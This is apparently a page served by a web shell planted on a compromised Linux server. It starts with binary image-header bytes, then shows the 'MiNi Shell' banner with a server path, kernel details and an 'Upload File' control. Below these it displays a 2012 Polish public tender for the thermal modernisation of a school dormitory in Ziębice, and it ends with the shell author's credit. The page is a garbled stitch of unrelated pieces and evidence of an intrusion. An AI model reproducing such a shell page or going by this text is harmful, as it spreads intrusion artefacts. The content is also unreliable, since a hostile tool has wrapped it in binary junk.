JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120604/187126-N-2012.html

<p class="kh_header"><b>Ząbkowice Śląskie: Termomodernizacja 
    Internatu Zespołu Szkół Ponadgimnazjalnych przy  ul. B. Chrobrego 12 w Ziębicach</b><br>
<b>Numer ogłoszenia: 187126 - 2012; data zamieszczenia: 04.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ząbkowicki , ul. Sienkiewicza 11, 57-200 Ząbkowice Śląskie, woj. dolnośląskie, tel. 074 8162800, faks 074 8162850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat-zabkowicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja 
    Internatu Zespołu Szkół Ponadgimnazjalnych przy  ul. B. Chrobrego 12 w Ziębicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia dotyczy wykonania robót budowlanych zadania pn. Termomodernizacja 
    internatu Zespołu Szkół Ponadgimnazjalnych przy  ul. B. Chrobrego 12 w Ziębicach  w ramach 
    projektu Termomodernizacja obiektów Powiatu  Ząbkowickiego  w  celu zmniejszenia zużycia 
    energii dofinansowanego ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki 
    Wodnej w Warszawie.
2. Ogólny zakres rzeczowy robót w budynku obejmuje:
       1) Prace termomodernizacyjne: 
           - ocieplenie poddasza wełną mineralną ścian, stropów i skosów poddasza,
           - wymiana stolarki okiennej na drewnianą, z zachowaniem wymiarów okien i podziałów jak w 
              oknach istniejących, podokienników drewnianych, a w kotłowni na stalową,
           - wymiana drzwi zewnętrznych na stalowe (poziom piwnic i pom. techniczne),
           - kotłownia - wymiana wszystkich instalacji, montaż naczynia wzbiorczego, demontaż i montaż
              istniejących kotłów grzewczych na węgiel ekogroszek,
           - wymiana instalacji centralnego ogrzewania (c.o.) z montażem ekranów zagrzejnikowych i  
             ciepłej wody użytkowej (c.w.u.), 
       2) Prace remontowe: 
          - remont konstrukcji więźby dachowej i ścian poddasza,
          - wymiana pokrycia dachowego z dachówki karpiówki,
          - wymiana rynien, rur spustowych, obróbek blacharskich,
          - wymiana instalacji odgromowej,
          - remont świetlika dachowego,
          - wymiana pokrycia daszków na papę termozgrzewalna przy kotłowni, wiatrołapie i zadaszeniu 
             tarasu,
          - remont kominów,
          - rozbudowa instalacji hydrantowej p.poż. w budynku,
          - wykonanie łazienek w pokojach,
          - remont - rewitalizacja elewacji,
          - wykonanie zabezpieczeń p.poż.  
3. Szczegółowo przedmiot zamówienia określa:
        1) Projekt budowlany  - zał. nr 9 do SIWZ
        2) Specyfikacje techniczne wykonania i odbioru robót budowlanych - zał. nr 10 do SIWZ,  
        3) Pomocniczo przedmiar robót - zał. nr 11 do SIWZ. 
4. Zamawiający zaleca dokonanie wizji lokalnej przed przystąpieniem do przygotowania oferty. 
5. Wykonawca zobowiązany jest do wykonania wszystkich robót niezbędnych do wykonania przedmiotu 
       zamówienia, zgodnie zasadami sztuki budowlanej i wiedzy technicznej, niezależnie od tego, czy 
       wynikają one wprost z dokumentów określonych w ust.3.3. 
6. Wymagania dotyczące robót:
       1) Wszystkie prace winny być zrealizowane zgodnie z przepisami, obowiązującymi normami, 
            warunkami technicznymi i sztuką budowlaną, przepisami bhp, ppoż. oraz poleceniami inspektora 
            nadzoru.
       2) Roboty należy prowadzić zgodnie z wymogami i warunkami dokumentacji określającej przedmiot 
           zamówienia, specyfikacją techniczną wykonania i odbioru robót budowlanych i wymogami 
           niniejszej specyfikacji.
7. Wymagania dotyczące materiałów:
       1) Użyte materiały winny być w I gatunku jakościowym i wymiarowym, posiadające dopuszczenia do 
           stosowania w budownictwie i zapewniające sprawność eksploatacyjną.
       2) Zamawiający dopuszcza zastosowanie materiałów i rozwiązań równoważnych niż opisane  w 
           dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych i 
           przedmiarze robót,  gdzie została wskazana marka, znak towarowy, producent pod warunkiem, że 
           spełniają wymagania określone przez  Zamawiającego w w/w dokumentach.
8. Ustalenia organizacyjne związane wykonaniem zamówienia:
       1) Budynek nie będzie użytkowany od dnia 01.07.2012r. do dnia 30.09.2012r., natomiast z dniem 
            01.10.2012r. budynek będzie użytkowany zgodnie z jego funkcją. Wykonawca uzgodnieni 
            kolejność i terminy wykonywania robót w tym zakresie z Dyrektorem Zespołu Szkół 
            Ponadgimanazjalnych w Ziębicach.
       2) Wykonawca jest zobowiązany do utrzymania porządku na budowie, a w szczególności z chwilą  
           użytkowania budynku, aby funkcjonowanie budynku odbywało się bez zakłóceń. 
9. Wymagania stawiane Wykonawcy:
       1) Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe wykonanie 
            zamówienia, za jakość, zgodność z warunkami technicznymi i jakościowymi określonymi dla 
            przedmiotu zamówienia.
       2) Wymagana jest należyta staranność przy realizacji zamówienia rozumiana, jako staranność
            profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia,
  3) Sporządzenie planu bezpieczeństwa i ochrony zdrowia.
  4) Spełnienia innych wymagań określonych w projekcie umowy oraz wynikających z obowiązujących
      przepisów.
  5) Ustalenia dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z 
      ustanowionym przedstawicielem Wykonawcy.
10. Możliwość zatrudnienia podwykonawców:
       1) Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonania części lub całości
           zamówienia podwykonawcom, w takim przypadku Wykonawca jest zobowiązany do wskazania w 
           swojej ofercie części zamówienia (zakresu), której wykonanie zamierza powierzyć  
           podwykonawcom
       2) Informacje na temat udziału podwykonawców w realizacji zamówienia należy zamieścić w 
           formularzu ofertowym,
       3) Zamawiający może zgodnie z art.641 k.c. wnieść sprzeciw lub zastrzeżenia do umowy zawartej
           pomiędzy Wykonawcą a podwykonawcą.
11. Wymagania dotyczące gwarancji:
         1) Wykonawca obejmie gwarancja całość przedmiotu zamówienia na okres min.5 lat, licząc od daty 
             odbioru końcowego robót bez zastrzeżeń dla całości zamówienia.
         2) Reklamacje dotyczące stwierdzonych usterek i wad załatwiane będą z należytą starannością w 
              terminie do14 dni od zgłoszenia.
         3) Okresy gwarancji udzielane przez Podwykonawców muszą odpowiadać, co najmniej okresowi 
              udzielonemu przez Wykonawców.
         4) Warunki gwarancyjne będą przekazane wraz z protokołem odbioru końcowego robót.
12. Zamawiający oświadcza, że na Termomodernizację internatu Zespołu Szkół Ponadgimnazjalnych 
        przy  ul. B. Chrobrego 12 w Ziębicach  posiada na decyzję Starosty Ząbkowickiego nr 96/2001 z 
        dnia 18.04.2011r o pozwoleniu na budowę oraz decyzję nr 153/2011 z dnia 01.03.2011r.
        Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu Delegatury w Wałbrzychu
        o pozwoleniu na prowadzenie prac i robót przy zabytku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.11.12.20-6, 45.45.30.00-7, 45.41.00.00-4, 45.44.21.00-8, 45.26.11.00-5, 45.45.30.00-7, 45.26.24.10-1, 45.26.12.11-6, 45.26.12.13-0, 45.31.23.11-0, 45.26.21.00-2, 45.31.60.00-5, 45.31.10.00-0, 45.31.73.00-5, 45.33.10.00-6, 45.33.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości 35 000 zł.
2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
      1) w pieniądzu : 
      2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z 
          tym że poręczenie kasy jest zawsze poręczeniem pieniężnym:
     3) gwarancjach bankowych:
     4) gwarancjach ubezpieczeniowych: 
     5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z dnia
         9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 
         2007r. Nr 42, poz.275).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie, przynajmniej 
 dwóch robót budowlanych w zakresie wynikającym z przedmiotu zamówienia o wartości każda 
 min.1 000 000 zł brutto.
Ocena spełnienia warunków dokonywana będzie w oparciu o złożone przez Wykonawcę dokumenty i oświadczenia wg formuły spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia, 
Zamawiający uzna dysponowanie osobą posiadającą uprawnienia budowlane w specjalności
             konstrukcyjno-budowlanej i min. 5 letnie doświadczenie kierowania robotami, wykażą się co 
             najmniej 2 letnią praktyką na budowie przy zabytkach nieruchomych oraz wykażą się 
             kierownikami robót w specjalności instalacyjno-inżynieryjnej w zakresie instalacji sanitarnych i 
             elektrycznych.

Ocena spełnienia warunków dokonywana będzie w oparciu o złożone przez Wykonawcę dokumenty i oświadczenia wg formuły spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna posiadanie opłaconej polisy potwierdzającej, że
          Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
          gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 1 000.000 zł. oraz 
           posiadanie środków finansowych lub zdolności kredytowej na kwotę nie mniejszą niż 1 000 000 zł.
Ocena spełnienia warunków dokonywana będzie w oparciu o złożone przez Wykonawcę dokumenty i oświadczenia wg formuły spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zmian regulacji prawnych obowiązujących w dniu podpisania umowy,
      2) Oznaczenia danych dotyczących Zamawiającego lub Wykonawcy. 
3) Zmiany Podwykonawców, formy wniesienia zabezpieczenia należytego wykonania umowy, 
      4) Terminu i zakresu wykonania zamówienia z przyczyn niezależnych od Zamawiającego i Wykonawcy,
           które zaistniały w trakcie realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-zabkowicki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat Ząbkowicki
 ul. Sienkiewicza 11,
  57-200 Ząbkowice Śl.   
pokój 307.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2012 godzina 09:00, miejsce: Powiat Ząbkowicki
ul. Sienkiewicza 11 ,
57-200 Ząbkowice Śl.
Biuro podawcze pok.110.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com